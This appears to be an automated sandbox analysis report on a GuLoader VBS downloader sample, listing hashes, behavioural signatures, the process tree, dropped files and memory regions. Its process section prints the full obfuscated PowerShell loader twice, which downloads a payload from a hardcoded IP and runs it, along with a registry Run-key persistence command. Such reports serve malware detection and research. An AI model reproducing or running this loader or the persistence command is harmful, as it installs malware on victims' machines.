Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
19-04-2024 01:16
Static task
static1
Behavioral task
behavioral1
Sample
418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs
Resource
win10v2004-20240412-en
General
-
Target
418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs
-
Size
16KB
-
MD5
ba91098f69e003ca4d4d9c83fa6350d6
-
SHA1
3553a1fe2fdbd2940a59ed20fb361781b6150abc
-
SHA256
418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f
-
SHA512
ec1aeea69144e0a96e815855f61c1e9e15f5be27f4bc1d19b05b6849df65d4b971592af46d7c8b47e4c6eb589b92a5b8936c801c98c04992fec5a65d3fd3f06f
-
SSDEEP
384:+uMcrrXFo5t8VvomRWq1hn+h/RW5MaMIN0Oq5u2:+tGov89lRW6hqZWqaLGv
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 764 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fravrist = "%desforuden% -w 1 $Bortkaldte=(Get-ItemProperty -Path 'HKCU:\\Diancecht\\').Divisionstegnene;%desforuden% ($Bortkaldte)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 1692 wab.exe 1692 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2464 powershell.exe 1692 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2464 set thread context of 1692 2464 powershell.exe wab.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 764 powershell.exe 2464 powershell.exe 2464 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 2944 wrote to memory of 764 2944 WScript.exe powershell.exe PID 2944 wrote to memory of 764 2944 WScript.exe powershell.exe PID 2944 wrote to memory of 764 2944 WScript.exe powershell.exe PID 764 wrote to memory of 2580 764 powershell.exe cmd.exe PID 764 wrote to memory of 2580 764 powershell.exe cmd.exe PID 764 wrote to memory of 2580 764 powershell.exe cmd.exe PID 764 wrote to memory of 2464 764 powershell.exe powershell.exe PID 764 wrote to memory of 2464 764 powershell.exe powershell.exe PID 764 wrote to memory of 2464 764 powershell.exe powershell.exe PID 764 wrote to memory of 2464 764 powershell.exe powershell.exe PID 2464 wrote to memory of 2716 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2716 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2716 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 2716 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 1692 2464 powershell.exe wab.exe PID 2464 wrote to memory of 1692 2464 powershell.exe wab.exe PID 2464 wrote to memory of 1692 2464 powershell.exe wab.exe PID 2464 wrote to memory of 1692 2464 powershell.exe wab.exe PID 2464 wrote to memory of 1692 2464 powershell.exe wab.exe PID 2464 wrote to memory of 1692 2464 powershell.exe wab.exe PID 1692 wrote to memory of 2992 1692 wab.exe cmd.exe PID 1692 wrote to memory of 2992 1692 wab.exe cmd.exe PID 1692 wrote to memory of 2992 1692 wab.exe cmd.exe PID 1692 wrote to memory of 2992 1692 wab.exe cmd.exe PID 2992 wrote to memory of 2476 2992 cmd.exe reg.exe PID 2992 wrote to memory of 2476 2992 cmd.exe reg.exe PID 2992 wrote to memory of 2476 2992 cmd.exe reg.exe PID 2992 wrote to memory of 2476 2992 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\418c376ea99f08d252dc0ce3650056497a2e180a7fb52bdb4a1a1cb661ef013f.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$decarbonizer = 1;$Spaadomsevnen='Substrin';$Spaadomsevnen+='g';Function Aristol($Dkfarverne151){$Reutilized=$Dkfarverne151.Length-$decarbonizer;For($Spiritusbestemmelsen=4; $Spiritusbestemmelsen -lt $Reutilized; $Spiritusbestemmelsen+=(5)){$Venskabsbyer+=$Dkfarverne151.$Spaadomsevnen.Invoke($Spiritusbestemmelsen, $decarbonizer);}$Venskabsbyer;}function studielektorerne($Unportmanteaued){. ($Lselysts79) ($Unportmanteaued);}$Miljvrnet=Aristol 'SkifMBysvoSuppzPhani oalSlavlStriaKoke/Tram5Tegl.prgt0Acce Aab(FyrrWBydeiChamnOpfydKonsoKnokwKlunsVesi PolyNAwfuTH,dr Gens1Stil0Knya. Def0 Un.;Flam ko,oWDeliiOb tnHalv6Pilt4Aalb;Tilf Tr nxPrep6A.ov4Bil.;Euda Eterr FrivAsyn: ,ei1Vrge2Besk1 Eft. num0 con).fsk ProvGTi keEsgecDonkkCo.ao Ful/Worm2Bi f0Pisk1 Ste0Min,0Ejno1 Lag0Disc1Conn PseuFInteiForrrMaddeNedtfE.itoH.tex Sal/Hela1 Unp2,nte1Dybf.,rev0 Kn. ';$Flyv=Aristol 'Em,tU TubsChaseHemar,aad-,asiAGavfgExemeFlytn VedtIsot ';$Halvbilleder=Aristol 'Bad.h reatAstrtunispT ai: ,pr/F rd/Biha8Anno7Larv.C.uz1K,ow2 Vet1 Mo,..xpa1Bo c0T,le5 E t.Konk1Dehy6 Uro3Inte/ sweS PattNotooha.prRemovCouneOvogs.tatiChror HypsOver4poda3Sign.DellpPhyssBirimBrit ';$Eksaktes=Aristol ' Pia> Sag ';$Lselysts79=Aristol ' Elei LabeUndexboks ';$Avokadoens = Aristol ' ,neeSvvnctourhPa loDoub .isp%scowaHeltpAugepPenndSoutaSeratSlasaSepo%Cyke\UnhiJ ,euo Brub.ondmUndeiOdonsFlast .enrdiare tresSkidsTrot.HaanT Sn,aO.klwSate Affi&Tr.p&P.ck FoddeLaencSk uhToneoUnpu Lac$ Trl ';studielektorerne (Aristol 'Pi.f$Se,vgDecalInduoSl,ebSp eaT.tilLow :.andT,pfohStrayNonlr Ti oNeditsubchSoffeGrovr GenaMeshp.etry Sa.= Cen( Forc,illmRemid Pro Okt/ B.uc .ed Medi$TaroASkravY froS,ank OrgaS,amdAruaoLam.eNondn Muls st)Afve ');studielektorerne (Aristol 'Gtep$Afr gParglS ruo ,onb CteaPecclSu k: MerT PacrDiploLesbjUdskaexfonunpasO elkVelae egsEn.a= Fil$ImpoHSubsa PaplBarfvHyp b anniEstulFrerl mmeeSalgdLumieSnu rNive.Aryls S bp yldlSc liKomptDumo(Son.$BrunE ,egkGrntsCavya A,tkSvigtBag eSciasspoi)Uafh ');$Halvbilleder=$Trojanskes[0];studielektorerne (Aristol 'Gr,s$Kavag Disl DigoK,geb Kl,aForklLitt:ForhSCig k DupuOrdheU.sksHy,epQuari Un.lFyrsfTr,oos.onrprotfsprraHo.etBuddtWhaleNonerFuneeUndesTrom=YounN Ba.e itiwsty - askO.estbstrojH,mieMes,c B,ftFinp PolySKirkybro.sAnt,tMe ae GeomHexa.He,eNSanteTegnt ale.UproW In e SigbBestCsenilSmooi egie ymbnPlant apr ');studielektorerne (Aristol 'Swac$Int.Srepak WinuPon,eShedsNouap.piuiPaaaltegnfTysoo UnarBaisf So,aF.emtJeertUnreeFogfrHerme .insDrac.,eksH PiceArbea,flad Wele te.rSprysPt.r[B.an$ zooFAnprlsuboyOmfavamb.] Ass=Bull$B,evMTraniRummlWis.jEks.v AngrRegen Bu,e TratBall ');$Anset=Aristol 'DuehS DiskUnsuuUndeeamphsF,cipste iBarelS,mmfNoncoFl,mrSurmf I.raFototA tot,umue D lr HakeUnres,ega.TautDStrioBlanwCiv.nM amlAmatoEstiaAccedVrisF SteiUncllSynteOemh(Pers$ ,reHFlinaPulpl Ud vImpabaccei.geulBef.l eaveCaridre.re.imurRede,Sixt$PhraCPr ooAfnaaDa.adTricjUr.nuUnvedA.phiae tcNonpast,ntdioioLandrinex).anc ';$Anset=$Thyrotherapy[1]+$Anset;$Coadjudicator=$Thyrotherapy[0];studielektorerne (Aristol ',art$alpegMalalCibbo GrabIsolaKiv l Pip:Nul S onkeAfstrSt prFloraInwetUnpee BatdSt,l=Uf,l(UpseTUncoeOv.rsfarvtFrem-LoyaPI caaBo gtOverhKrse Non$,idsCBr.oo S,ra PredSumajOl suMound Ti,i BlucBistaAuretlumiopladrRe,e)Spis ');while (!$Serrated) {studielektorerne (Aristol 'Hinn$Kva,gN,nalAftro ab,b.itaaS,pelMime:.haoScowcpE iseFiskk UnstPlufr OtauSca.m.oicsMapl=Ta s$,raut Lokr RecuRes eUnde ') ;studielektorerne $Anset;studielektorerne (Aristol 'H,emS La tCabaaPlasrParctWatc-CockS Gtel,ilseIn aeda sp Ens Frek4Tra ');studielektorerne (Aristol 'Sten$ho.sgP.yclBootoAdelb FaraFourlPrec: .onS ranePho,rSemirTrama evatHankeOx,rdA.st=Phen( LarTLnnie massFiretRis,-Bl.nPCho.aPirot.iffhT.an Dimw$dogmCint oNi.haDi ed BlnjP rauDaeddOutdiUnrecAphaa.espt B,ro BrurAnem)Unar ') ;studielektorerne (Aristol 'del $HeargBeetlGei,oFotobMenaaSalslBlaa:PrepP,yrtaImmohundeuSlant C oaAdrinSnee=Vaab$,halgReinlRygsoHajrbCaroaPacklFlou: SkoC ovrlKar.a vegmSkvam piciNejdlt,leySlag+E ro+Smo,% Pyr$VandTVrimr Kr.oStilj BaraDaaln Snas .rok IndeEff,sfirc.,addc LunoDiamuSys,nSolitFors ') ;$Halvbilleder=$Trojanskes[$Pahutan];}studielektorerne (Aristol 'Pter$ Bssg EvalKu doMaskb,uitaStall S.e:MillTPimaaPartbSid rVinei mitzI re Ov =C.ac KrseGLy,te,ytttTset-TraiCL,sioDo,knSka.t rape Fl nClartPo s Fin$ BliCBetaoPeltaTilrd.racj R.ouIdyldPo.ai Derc YalaTrumtWantoUns,r Sli ');studielektorerne (Aristol 'Indl$GastgFaull OpmoTonobStvfaHomilTrop:D.fuBAlbieIco,c SamlReplapublmAgaio AllrRe.oiSupen D,agSumm Meta=Cyan Eksi[ NonSResyyKoras Hant LineNikkm lic.SociCg,psoScornFyrivBlote TubrUnu.tbesv]Baro:Iko.:pengFGenhrOmfao termafl.BAntaaHamusAtomeVejr6 res4DespSBagtt MedrBakkiSnoonGry,g ili(tale$OmbjT SpiaS.arb OptrsnitiS.ndzUnde)Fi,k ');studielektorerne (Aristol 'Leat$ RepgBl,ml Bido,dmlb.onea aaslYu.k: SwoSKonfoSemic.ndemStabaNovonTol ru siyPra, son=Fi,e Disa[PrinSFi iyKlitsAntit ruseEtagmNy d.StafTKildeUnhuxInfrthier.subdE ten SupcNonpoVejodCl.viB ggnIllug,oej] ,as:Diff:MythAGlosSUndeCRegnIHerfISeed.F mrGCic eTospt ,igSBen tMissrPro,iOve.n ReggSlav( Fug$DepoBPelse alecAp lllaana RapmBronoVensr Stuiti.snPal.gTime) Sk. ');studielektorerne (Aristol 'Nons$aforgKafflRabaoSvadb,andaM,telColt: Be G Kosu erndQuins Heln Doo= Le $.ailS O.do ,npc.onnmDysea omin powrDiaryStai.Progs baluDunkbAf,usravatOdderNyt.i llenStrag,myx(Nat,3mis 3Ungm7Va,r6Bl,n2Corv5Poah,Acep2Klis7Ar,a2Prog5Auto3 Pe.)Aabe ');studielektorerne $Gudsn;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jobmistress.Taw && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$decarbonizer = 1;$Spaadomsevnen='Substrin';$Spaadomsevnen+='g';Function Aristol($Dkfarverne151){$Reutilized=$Dkfarverne151.Length-$decarbonizer;For($Spiritusbestemmelsen=4; $Spiritusbestemmelsen -lt $Reutilized; $Spiritusbestemmelsen+=(5)){$Venskabsbyer+=$Dkfarverne151.$Spaadomsevnen.Invoke($Spiritusbestemmelsen, $decarbonizer);}$Venskabsbyer;}function studielektorerne($Unportmanteaued){. ($Lselysts79) ($Unportmanteaued);}$Miljvrnet=Aristol 'SkifMBysvoSuppzPhani oalSlavlStriaKoke/Tram5Tegl.prgt0Acce Aab(FyrrWBydeiChamnOpfydKonsoKnokwKlunsVesi PolyNAwfuTH,dr Gens1Stil0Knya. Def0 Un.;Flam ko,oWDeliiOb tnHalv6Pilt4Aalb;Tilf Tr nxPrep6A.ov4Bil.;Euda Eterr FrivAsyn: ,ei1Vrge2Besk1 Eft. num0 con).fsk ProvGTi keEsgecDonkkCo.ao Ful/Worm2Bi f0Pisk1 Ste0Min,0Ejno1 Lag0Disc1Conn PseuFInteiForrrMaddeNedtfE.itoH.tex Sal/Hela1 Unp2,nte1Dybf.,rev0 Kn. ';$Flyv=Aristol 'Em,tU TubsChaseHemar,aad-,asiAGavfgExemeFlytn VedtIsot ';$Halvbilleder=Aristol 'Bad.h reatAstrtunispT ai: ,pr/F rd/Biha8Anno7Larv.C.uz1K,ow2 Vet1 Mo,..xpa1Bo c0T,le5 E t.Konk1Dehy6 Uro3Inte/ sweS PattNotooha.prRemovCouneOvogs.tatiChror HypsOver4poda3Sign.DellpPhyssBirimBrit ';$Eksaktes=Aristol ' Pia> Sag ';$Lselysts79=Aristol ' Elei LabeUndexboks ';$Avokadoens = Aristol ' ,neeSvvnctourhPa loDoub .isp%scowaHeltpAugepPenndSoutaSeratSlasaSepo%Cyke\UnhiJ ,euo Brub.ondmUndeiOdonsFlast .enrdiare tresSkidsTrot.HaanT Sn,aO.klwSate Affi&Tr.p&P.ck FoddeLaencSk uhToneoUnpu Lac$ Trl ';studielektorerne (Aristol 'Pi.f$Se,vgDecalInduoSl,ebSp eaT.tilLow :.andT,pfohStrayNonlr Ti oNeditsubchSoffeGrovr GenaMeshp.etry Sa.= Cen( Forc,illmRemid Pro Okt/ B.uc .ed Medi$TaroASkravY froS,ank OrgaS,amdAruaoLam.eNondn Muls st)Afve ');studielektorerne (Aristol 'Gtep$Afr gParglS ruo ,onb CteaPecclSu k: MerT PacrDiploLesbjUdskaexfonunpasO elkVelae egsEn.a= Fil$ImpoHSubsa PaplBarfvHyp b anniEstulFrerl mmeeSalgdLumieSnu rNive.Aryls S bp yldlSc liKomptDumo(Son.$BrunE ,egkGrntsCavya A,tkSvigtBag eSciasspoi)Uafh ');$Halvbilleder=$Trojanskes[0];studielektorerne (Aristol 'Gr,s$Kavag Disl DigoK,geb Kl,aForklLitt:ForhSCig k DupuOrdheU.sksHy,epQuari Un.lFyrsfTr,oos.onrprotfsprraHo.etBuddtWhaleNonerFuneeUndesTrom=YounN Ba.e itiwsty - askO.estbstrojH,mieMes,c B,ftFinp PolySKirkybro.sAnt,tMe ae GeomHexa.He,eNSanteTegnt ale.UproW In e SigbBestCsenilSmooi egie ymbnPlant apr ');studielektorerne (Aristol 'Swac$Int.Srepak WinuPon,eShedsNouap.piuiPaaaltegnfTysoo UnarBaisf So,aF.emtJeertUnreeFogfrHerme .insDrac.,eksH PiceArbea,flad Wele te.rSprysPt.r[B.an$ zooFAnprlsuboyOmfavamb.] Ass=Bull$B,evMTraniRummlWis.jEks.v AngrRegen Bu,e TratBall ');$Anset=Aristol 'DuehS DiskUnsuuUndeeamphsF,cipste iBarelS,mmfNoncoFl,mrSurmf I.raFototA tot,umue D lr HakeUnres,ega.TautDStrioBlanwCiv.nM amlAmatoEstiaAccedVrisF SteiUncllSynteOemh(Pers$ ,reHFlinaPulpl Ud vImpabaccei.geulBef.l eaveCaridre.re.imurRede,Sixt$PhraCPr ooAfnaaDa.adTricjUr.nuUnvedA.phiae tcNonpast,ntdioioLandrinex).anc ';$Anset=$Thyrotherapy[1]+$Anset;$Coadjudicator=$Thyrotherapy[0];studielektorerne (Aristol ',art$alpegMalalCibbo GrabIsolaKiv l Pip:Nul S onkeAfstrSt prFloraInwetUnpee BatdSt,l=Uf,l(UpseTUncoeOv.rsfarvtFrem-LoyaPI caaBo gtOverhKrse Non$,idsCBr.oo S,ra PredSumajOl suMound Ti,i BlucBistaAuretlumiopladrRe,e)Spis ');while (!$Serrated) {studielektorerne (Aristol 'Hinn$Kva,gN,nalAftro ab,b.itaaS,pelMime:.haoScowcpE iseFiskk UnstPlufr OtauSca.m.oicsMapl=Ta s$,raut Lokr RecuRes eUnde ') ;studielektorerne $Anset;studielektorerne (Aristol 'H,emS La tCabaaPlasrParctWatc-CockS Gtel,ilseIn aeda sp Ens Frek4Tra ');studielektorerne (Aristol 'Sten$ho.sgP.yclBootoAdelb FaraFourlPrec: .onS ranePho,rSemirTrama evatHankeOx,rdA.st=Phen( LarTLnnie massFiretRis,-Bl.nPCho.aPirot.iffhT.an Dimw$dogmCint oNi.haDi ed BlnjP rauDaeddOutdiUnrecAphaa.espt B,ro BrurAnem)Unar ') ;studielektorerne (Aristol 'del $HeargBeetlGei,oFotobMenaaSalslBlaa:PrepP,yrtaImmohundeuSlant C oaAdrinSnee=Vaab$,halgReinlRygsoHajrbCaroaPacklFlou: SkoC ovrlKar.a vegmSkvam piciNejdlt,leySlag+E ro+Smo,% Pyr$VandTVrimr Kr.oStilj BaraDaaln Snas .rok IndeEff,sfirc.,addc LunoDiamuSys,nSolitFors ') ;$Halvbilleder=$Trojanskes[$Pahutan];}studielektorerne (Aristol 'Pter$ Bssg EvalKu doMaskb,uitaStall S.e:MillTPimaaPartbSid rVinei mitzI re Ov =C.ac KrseGLy,te,ytttTset-TraiCL,sioDo,knSka.t rape Fl nClartPo s Fin$ BliCBetaoPeltaTilrd.racj R.ouIdyldPo.ai Derc YalaTrumtWantoUns,r Sli ');studielektorerne (Aristol 'Indl$GastgFaull OpmoTonobStvfaHomilTrop:D.fuBAlbieIco,c SamlReplapublmAgaio AllrRe.oiSupen D,agSumm Meta=Cyan Eksi[ NonSResyyKoras Hant LineNikkm lic.SociCg,psoScornFyrivBlote TubrUnu.tbesv]Baro:Iko.:pengFGenhrOmfao termafl.BAntaaHamusAtomeVejr6 res4DespSBagtt MedrBakkiSnoonGry,g ili(tale$OmbjT SpiaS.arb OptrsnitiS.ndzUnde)Fi,k ');studielektorerne (Aristol 'Leat$ RepgBl,ml Bido,dmlb.onea aaslYu.k: SwoSKonfoSemic.ndemStabaNovonTol ru siyPra, son=Fi,e Disa[PrinSFi iyKlitsAntit ruseEtagmNy d.StafTKildeUnhuxInfrthier.subdE ten SupcNonpoVejodCl.viB ggnIllug,oej] ,as:Diff:MythAGlosSUndeCRegnIHerfISeed.F mrGCic eTospt ,igSBen tMissrPro,iOve.n ReggSlav( Fug$DepoBPelse alecAp lllaana RapmBronoVensr Stuiti.snPal.gTime) Sk. ');studielektorerne (Aristol 'Nons$aforgKafflRabaoSvadb,andaM,telColt: Be G Kosu erndQuins Heln Doo= Le $.ailS O.do ,npc.onnmDysea omin powrDiaryStai.Progs baluDunkbAf,usravatOdderNyt.i llenStrag,myx(Nat,3mis 3Ungm7Va,r6Bl,n2Corv5Poah,Acep2Klis7Ar,a2Prog5Auto3 Pe.)Aabe ');studielektorerne $Gudsn;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jobmistress.Taw && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fravrist" /t REG_EXPAND_SZ /d "%desforuden% -w 1 $Bortkaldte=(Get-ItemProperty -Path 'HKCU:\Diancecht\').Divisionstegnene;%desforuden% ($Bortkaldte)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fravrist" /t REG_EXPAND_SZ /d "%desforuden% -w 1 $Bortkaldte=(Get-ItemProperty -Path 'HKCU:\Diancecht\').Divisionstegnene;%desforuden% ($Bortkaldte)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Jobmistress.TawFilesize
475KB
MD544da74895a8d07aacdd0c252f1b27dd8
SHA172ea60a757ce980b2de563caebdfbf9facd51835
SHA256b63ba6d7514534338dd6576f273a44cc84037bd57414fb952ff2ced5c82ab069
SHA512528dc0ec8d400664e6c2f09e302cd9232886de7e838a3d64d327637ee5f052677ee8fecaa81f963c4f319121f7cf99c54b4017d8f9bb159a24218724af6a6786
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RMNS0L65OQJYTEAWP3RN.tempFilesize
7KB
MD5fe64189f2598fc9f255b829187df46e8
SHA166c2f1c6a820a23eca9a1a82c8f293114dd0198e
SHA25692d200fb30e44aea12f9561d40e8cbaecc745e7f8fbe9923b56ccee567b2e288
SHA5125eafacdb9dbce17bea08fe12eab18e353b7e1521b22813eba300b5c96ef3860e6a2ccb1350622a6dcda5e1709dbdcda81500b112e20edfd4f601343cb6b50874
-
memory/764-22-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-23-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-8-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-9-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-10-0x000007FEF5D00000-0x000007FEF669D000-memory.dmpFilesize
9.6MB
-
memory/764-6-0x000007FEF5D00000-0x000007FEF669D000-memory.dmpFilesize
9.6MB
-
memory/764-39-0x000007FEF5D00000-0x000007FEF669D000-memory.dmpFilesize
9.6MB
-
memory/764-25-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-24-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-7-0x0000000002830000-0x00000000028B0000-memory.dmpFilesize
512KB
-
memory/764-5-0x00000000022D0000-0x00000000022D8000-memory.dmpFilesize
32KB
-
memory/764-20-0x000007FEF5D00000-0x000007FEF669D000-memory.dmpFilesize
9.6MB
-
memory/764-4-0x000000001B770000-0x000000001BA52000-memory.dmpFilesize
2.9MB
-
memory/1692-34-0x0000000077A90000-0x0000000077B66000-memory.dmpFilesize
856KB
-
memory/1692-32-0x00000000778A0000-0x0000000077A49000-memory.dmpFilesize
1.7MB
-
memory/1692-37-0x0000000077A90000-0x0000000077B66000-memory.dmpFilesize
856KB
-
memory/1692-36-0x0000000001400000-0x0000000005D9E000-memory.dmpFilesize
73.6MB
-
memory/1692-33-0x0000000077AC6000-0x0000000077AC7000-memory.dmpFilesize
4KB
-
memory/2464-21-0x0000000002BC0000-0x0000000002C00000-memory.dmpFilesize
256KB
-
memory/2464-28-0x0000000073740000-0x0000000073CEB000-memory.dmpFilesize
5.7MB
-
memory/2464-29-0x0000000002BC0000-0x0000000002C00000-memory.dmpFilesize
256KB
-
memory/2464-30-0x00000000778A0000-0x0000000077A49000-memory.dmpFilesize
1.7MB
-
memory/2464-31-0x0000000077A90000-0x0000000077B66000-memory.dmpFilesize
856KB
-
memory/2464-26-0x0000000006600000-0x000000000AF9E000-memory.dmpFilesize
73.6MB
-
memory/2464-27-0x0000000004DD0000-0x0000000004DD1000-memory.dmpFilesize
4KB
-
memory/2464-18-0x0000000002BC0000-0x0000000002C00000-memory.dmpFilesize
256KB
-
memory/2464-16-0x0000000002BC0000-0x0000000002C00000-memory.dmpFilesize
256KB
-
memory/2464-17-0x0000000073740000-0x0000000073CEB000-memory.dmpFilesize
5.7MB
-
memory/2464-15-0x0000000073740000-0x0000000073CEB000-memory.dmpFilesize
5.7MB